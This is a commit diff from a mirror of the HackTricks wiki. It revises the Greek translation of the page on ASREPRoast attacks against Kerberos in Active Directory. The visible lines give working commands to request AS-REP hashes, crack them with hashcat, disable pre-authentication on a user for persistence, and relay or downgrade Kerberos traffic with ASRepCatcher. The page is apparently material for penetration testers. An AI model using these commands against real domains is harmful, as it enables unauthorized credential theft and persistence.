mirror of
https://github.com/HackTricks-wiki/hacktricks.git
synced 2025-10-10 18:36:50 +00:00
Translated ['src/windows-hardening/active-directory-methodology/asreproa
This commit is contained in:
parent
9039a1b945
commit
20200bb538
@ -4,7 +4,7 @@
|
||||
|
||||
## ASREPRoast
|
||||
|
||||
Το ASREPRoast είναι μια επίθεση ασφαλείας που εκμεταλλεύεται χρήστες που δεν διαθέτουν το **απαιτούμενο χαρακτηριστικό προ-αυθεντικοποίησης Kerberos**. Ουσιαστικά, αυτή η ευπάθεια επιτρέπει στους επιτιθέμενους να ζητούν αυθεντικοποίηση για έναν χρήστη από τον Domain Controller (DC) χωρίς να χρειάζεται ο κωδικός πρόσβασης του χρήστη. Ο DC στη συνέχεια απαντά με ένα μήνυμα κρυπτογραφημένο με το κλειδί που προέρχεται από τον κωδικό πρόσβασης του χρήστη, το οποίο οι επιτιθέμενοι μπορούν να προσπαθήσουν να σπάσουν εκτός σύνδεσης για να ανακαλύψουν τον κωδικό πρόσβασης του χρήστη.
|
||||
ASREPRoast είναι μια επίθεση ασφαλείας που εκμεταλλεύεται χρήστες που δεν έχουν το **απαιτούμενο χαρακτηριστικό προ-αυθεντικοποίησης Kerberos**. Ουσιαστικά, αυτή η ευπάθεια επιτρέπει στους επιτιθέμενους να ζητούν αυθεντικοποίηση για έναν χρήστη από τον Domain Controller (DC) χωρίς να χρειάζεται ο κωδικός πρόσβασης του χρήστη. Ο DC στη συνέχεια απαντά με ένα μήνυμα κρυπτογραφημένο με το κλειδί που προέρχεται από τον κωδικό πρόσβασης του χρήστη, το οποίο οι επιτιθέμενοι μπορούν να προσπαθήσουν να σπάσουν εκτός σύνδεσης για να ανακαλύψουν τον κωδικό πρόσβασης του χρήστη.
|
||||
|
||||
Οι κύριες απαιτήσεις για αυτή την επίθεση είναι:
|
||||
|
||||
@ -33,7 +33,7 @@ python GetNPUsers.py jurassic.park/triceratops:Sh4rpH0rns -request -format hashc
|
||||
Get-ASREPHash -Username VPN114user -verbose #From ASREPRoast.ps1 (https://github.com/HarmJ0y/ASREPRoast)
|
||||
```
|
||||
> [!WARNING]
|
||||
> Η εκτέλεση AS-REP Roasting με το Rubeus θα δημιουργήσει ένα 4768 με τύπο κρυπτογράφησης 0x17 και τύπο προαυτοποίησης 0.
|
||||
> AS-REP Roasting με το Rubeus θα δημιουργήσει ένα 4768 με τύπο κρυπτογράφησης 0x17 και τύπο προαυτοποίησης 0.
|
||||
|
||||
### Cracking
|
||||
```bash
|
||||
@ -42,18 +42,18 @@ hashcat -m 18200 --force -a 0 hashes.asreproast passwords_kerb.txt
|
||||
```
|
||||
### Επιμονή
|
||||
|
||||
Αναγκάστε **preauth** που δεν απαιτείται για έναν χρήστη όπου έχετε **GenericAll** δικαιώματα (ή δικαιώματα για να γράψετε ιδιότητες):
|
||||
Αναγκάστε το **preauth** να μην απαιτείται για έναν χρήστη όπου έχετε δικαιώματα **GenericAll** (ή δικαιώματα για να γράψετε ιδιότητες):
|
||||
```bash:Using Windows
|
||||
Set-DomainObject -Identity <username> -XOR @{useraccountcontrol=4194304} -Verbose
|
||||
```
|
||||
|
||||
```bash:Using Linux
|
||||
bloodyAD -u user -p 'totoTOTOtoto1234*' -d crash.lab --host 10.100.10.5 add uac -f DONT_REQ_PREAUTH
|
||||
bloodyAD -u user -p 'totoTOTOtoto1234*' -d crash.lab --host 10.100.10.5 add uac -f DONT_REQ_PREAUTH 'target_user'
|
||||
```
|
||||
## ASREProast χωρίς διαπιστευτήρια
|
||||
|
||||
Ένας επιτιθέμενος μπορεί να χρησιμοποιήσει μια θέση man-in-the-middle για να συλλάβει τα πακέτα AS-REP καθώς διασχίζουν το δίκτυο χωρίς να βασίζεται στην απενεργοποίηση της προ-αυθεντικοποίησης Kerberos. Επομένως, λειτουργεί για όλους τους χρήστες στο VLAN.\
|
||||
[ASRepCatcher](https://github.com/Yaxxine7/ASRepCatcher) μας επιτρέπει να το κάνουμε αυτό. Επιπλέον, το εργαλείο αναγκάζει τους πελάτες σταθμούς εργασίας να χρησιμοποιούν RC4 τροποποιώντας τη διαπραγμάτευση Kerberos.
|
||||
[ASRepCatcher](https://github.com/Yaxxine7/ASRepCatcher) μας επιτρέπει να το κάνουμε αυτό. Επιπλέον, το εργαλείο αναγκάζει τους πελάτες σταθμούς εργασίας να χρησιμοποιούν RC4 αλλάζοντας τη διαπραγμάτευση Kerberos.
|
||||
```bash
|
||||
# Actively acting as a proxy between the clients and the DC, forcing RC4 downgrade if supported
|
||||
ASRepCatcher relay -dc $DC_IP
|
||||
|
Loading…
x
Reference in New Issue
Block a user